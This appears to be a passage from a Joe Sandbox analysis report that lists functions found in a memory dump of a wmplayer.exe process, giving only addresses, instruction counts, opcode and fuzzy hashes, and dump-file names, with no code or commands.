Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
Instruction ID: 1edf9a8dddd538e4372f83734b54718913ec847087b5d73e36828a5c80bed974
Opcode Fuzzy Hash: 509a2c55ce54a41229e56678be0c357681a649a505367bd8187faa01e4e3560c
Instruction Fuzzy Hash: 2F51DD76A0460AAFEB15DBA8C848BADB7B4BF45314F1840EAE402E7390DB749901CB81

Function 038FD26B Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
Instruction ID: 3f5e18785c6a06264d425c3460866a9dd0d2d228bb65cc75348d814591c353db
Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
Instruction Fuzzy Hash: BC516C766087469FC311CFA8C884B5ABBE5FBC8344F04896DFA94DB244D734E949CB92

Function 038351ED Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
Instruction ID: b005fbed5598a6996e000ff30227f9765ceb6e596d24eb2849d13a6cb084054b
Opcode Fuzzy Hash: 4094c6502c39d1d731f1cf305bb035faa1a88a7ae08f7a0eb0dc3de2060effa8
Instruction Fuzzy Hash: EE517A75A05319DFEF21DAE9C840BADB3B8BB4B718F1804D9E811EB350D7B59940CB92

Function 038601F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
Instruction ID: 4e62361e391e788de25f8af4534774a0c8b5de5a1556b23bae1e1b3bb7bf28d4
Opcode Fuzzy Hash: 8f45adb53c8f08393f1d1b25220cc8f94eb6accd3328aa103b40358d9b1839f4
Instruction Fuzzy Hash: B941B0B69042189BCB15DFE8C440AEDF7B4BF88714F18819AE816FB340D7349D41CBA9

Function 03836154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
Instruction ID: 6ee9fffaca05a82db7059ddc4e214bc7603421db4cef9e5c50eab4745dc922f4
Opcode Fuzzy Hash: dca7b6243bff59e9ef1a4165e2370ab8c3a4188e538f443528fe59cb8f2c20f3
Instruction Fuzzy Hash: 8551077090461AEBDB25DBACCC44BA8BBB5EF02318F1942E5D425DB7C0E7789981CF81

Function 0382B136 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
Instruction ID: 20c9c9c0068b13b4805291dd1c5cc4f3da263d8f4c47b1310159a51dfd60ae80
Opcode Fuzzy Hash: ab4a37587c3a749f685c783aae75f6446d564923da48f9f10bcd2d7fb23c3ecb
Instruction Fuzzy Hash: EA4168B5641715AFDB22EFE8C880B2ABBF8EF40794F0484E9E511DB650D774D880CBA1

Function 0382A020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: 09c726aa4c3b650cebf03845b6edebce30ca4a73f8e20a6b8b93337b10bdfc6a
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: 26412B31A00225DBDB29EFD984507BAFB62EFD0754F1980EAE945DB240DA399DC0CB91

Function 038402E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction ID: 055eadf0f94ae92eb2e8e29caaf7dbd2826d3da80a9317cafe60220edb9738c0
Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction Fuzzy Hash: 59312572A04248AFDB21CBE8CC40B9AFFE8FF44314F0885E6E815DB352D2749840CBA1

Function 03859274 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0813a145ccf423da9a7c8d969538231cd095f7f5a95ac91cefa7edbc0d6251f
Instruction ID: 7e4c7b6a464aa88728281d36fcbc2b2945c5569025f31025b2779f0d0dd686dd
Opcode Fuzzy Hash: f0813a145ccf423da9a7c8d969538231cd095f7f5a95ac91cefa7edbc0d6251f
Instruction Fuzzy Hash: 99316275A00728EFDB21DBA8CC40B9AB7B5AF85714F5501D9F94CEB280DB309E44CB51

Function 03834260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571c296465a9198f3fe77c75ba525d6f7eb7c2fae537ca3c4012fb960fdfd9ab
Instruction ID: 93ae91733355cf3a179e2dee0593a005ff05e9958fa53004e562f97540b6d442
Opcode Fuzzy Hash: 571c296465a9198f3fe77c75ba525d6f7eb7c2fae537ca3c4012fb960fdfd9ab
Instruction Fuzzy Hash: E641BF75200B44DFDB22DFE9C880F9AB7E9AB46314F1844AAE599CF750C774E804CB91

Function 038550E4 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
Instruction ID: 03de6c872d3493f9c874e7b0673d98c918236f1bcb0c860eca580d5b794453df
Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
Instruction Fuzzy Hash: BA31F7317483459BDB22DAA8C800767FBD9AB86754F4C85EAFC86CB380D274D841C792

Function 038F61C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61f34d193c8c5b979c59623681da04c80f37aacd5b1572a80441f953fe78d9e
Instruction ID: a9218496486b83c0ffb917e23a4c0cfc19dda637a9d61e9f29ccf5c84141b119
Opcode Fuzzy Hash: d61f34d193c8c5b979c59623681da04c80f37aacd5b1572a80441f953fe78d9e
Instruction Fuzzy Hash: FF31A176A00259EFDB15DFE8C840BAEB7B5EB44B40F5942A9E500EB244E774ED00CB94

Function 038F60B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8746f7629faecc1b16b53223d0140f3c2bd527c423c671ce4ad6b18062bfe303
Instruction ID: ea7b14710c9e6afd5636929323cbe60f31033111a4db6930c4ed26fb6fb8954d
Opcode Fuzzy Hash: 8746f7629faecc1b16b53223d0140f3c2bd527c423c671ce4ad6b18062bfe303
Instruction Fuzzy Hash: F331E235700719AFDB12EFE9C840B6EBBB9AF84754F1402E9E641EB341EA30DC408B91

Function 038307AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dff0c9ddd77fdeb848cb078552c977c431ab8c284d56ed0699988f351321c3e
Instruction ID: 5773cb1e9140d3c95eb90500c52b1ef5040df5a4cef0d9bd98a6e6da1983940e
Opcode Fuzzy Hash: 7dff0c9ddd77fdeb848cb078552c977c431ab8c284d56ed0699988f351321c3e
Instruction Fuzzy Hash: 313105B6A04755DBC711EEA88C80A6BBBA9EF86650F0545A8FC56DB310DA30DC00C7D2

Function 038357C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df31f734553a4d12538ab081850cba39e1c385816811222066560da505adeebf
Instruction ID: 80d2ce4d7792c50c1a33237109431a0a911d2dc0a7e81afd444f65b64ff36041
Opcode Fuzzy Hash: df31f734553a4d12538ab081850cba39e1c385816811222066560da505adeebf
Instruction Fuzzy Hash: 4B318D79715A09FFDB51DBA4CE40AAABBA6FF85204F4850A5E901DBB50D734E830CBC1

Function 0385438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ad277244ab3abeeda72f1eed2f8ffa6471019efd451a7b2378d2e4a8f9d00f
Instruction ID: 9b33c8d7b8ac9d787015f19de6ac1e2a52cbd5d2a2014a49b1a2db1b7680a06f
Opcode Fuzzy Hash: 50ad277244ab3abeeda72f1eed2f8ffa6471019efd451a7b2378d2e4a8f9d00f
Instruction Fuzzy Hash: A631F631B017459FDB20EFE9C880A6FB7F9AB80305F0484AAE805D7650D730EA85CB51

Function 038392C5 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
Instruction ID: 7e509502f056cc668e9d135a8702137a736344bc35e12d6dc9103265794d919e
Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
Instruction Fuzzy Hash: 913170B56083499FCB01DF98D840A5ABBE9EF89354F0409AAF855DB391D734DC14CBA2

Function 03887190 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction ID: 5b6f55650d48e3ca192e17b479ed2f3aed7e6741e317f66e48229969399b35cf
Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction Fuzzy Hash: D9312279604206CFC710CF68C480956BBF5FF89354B2986A9F958DB325EB30E906CB91

Function 038EC3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: 2ccfe20c068392f76520d31c51592472c70c1647861316535ec8b84dead6b1a5
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: 97212D3FA0075566CB14EBE98800ABAFBB5EF41714F40809AFD66CB551E635DA50C361

Function 0382C156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7ddfa47a38822fcd2135bc1b8970aa8a3656dfeaa90e9066c379a4bcf90afd
Instruction ID: a6cfa9db7885eae8d14fe2bcdc97436abadd67cde802dfffac75aa417d4eee44
Opcode Fuzzy Hash: fc7ddfa47a38822fcd2135bc1b8970aa8a3656dfeaa90e9066c379a4bcf90afd
Instruction Fuzzy Hash: 1631E5B65003148BCB30FFA8CC41BA9B7B8AF41314F5881E9D845DF7C1DA74998ACBA1

Function 0382E388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: c359836e5e463cdf6e2675f191a6f76194a24882a6e5dd294faa36daf367ebaa
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: 7D31A931600618EFD721CBA8C884F6ABBF8EF85318F1444A8E502CB290E730EA42CB51

Function 0385F32A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
Instruction ID: 225988bd87aaf18a1bb820528ffa3631f6b843b5119840e1df644c3435427829
Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
Instruction Fuzzy Hash: 4821C272200304DFD719DF55C441B66BBE9EF95365F1541ADE606CB290EB70E801CB94

Function 038B019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a471e550afbaca24e97daea720f2096a1ea26e3d9654dd136ad952be21bc7f6e
Instruction ID: 38e3b39b82c0447a8d3b38f9c3d38477de6a646c92a53f2e953cfe948e9b8b70
Opcode Fuzzy Hash: a471e550afbaca24e97daea720f2096a1ea26e3d9654dd136ad952be21bc7f6e
Instruction Fuzzy Hash: B8218BB5600649ABC715DBACC840B6AB7B8FF48740F1800A9F944DB7A1D778ED50CBA9

Function 038B0283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8622e56908f8726de967cb285ad30ec1eeb5fa031882ae5f01e7eafd605776c
Instruction ID: 0be58a93d0fef08f57551ea2dce257293a173f2916876ae11b775730057e6379
Opcode Fuzzy Hash: a8622e56908f8726de967cb285ad30ec1eeb5fa031882ae5f01e7eafd605776c
Instruction Fuzzy Hash: 34219DB290434A9BC711EBE9C848B9BB7ECBF85244F0844D6BC80CB761D774D948C6A2

Function 038AD0C0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction ID: 7ac1a96713f9e8ac1b49306e3e38f6d380abd40916c30d398c0ef7f635834522
Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction Fuzzy Hash: 4221D072644B04ABE311DE5C8C51B5ABBA5EB88720F04016AF944DB7A0D330D805C7AA

Function 0386A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3670cae0ef8712e89ebfa8472fa7684e67be1dd4d126933d72f7ca35937ab158
Instruction ID: 78d57cd42159fb73be0fade60ec16d081f7dd9f9f223bac33403b581777550b3
Opcode Fuzzy Hash: 3670cae0ef8712e89ebfa8472fa7684e67be1dd4d126933d72f7ca35937ab158
Instruction Fuzzy Hash: B321AF79200B109FC728DF69C900B46B7F5AF88704F1884A8A509CBB51E335E842CB94

Function 03860124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: d842d2839ce2c911f0b889ca27e37e9e6014b8e92d7522d07c8a5aff07d95743
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: C411DDB6600708AFD722DAC8C841FAABBB8EB80754F1400A9E600CF180D675EE44CB69

Function 038380E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a756b15f809604534df994d08c8b6419c01da83ed65c087d09d7abbce2b353
Instruction ID: 31febe2a348dc7c71d9a18b5aa8c1c74fb999f209cdc916ec66c423fd81b8770
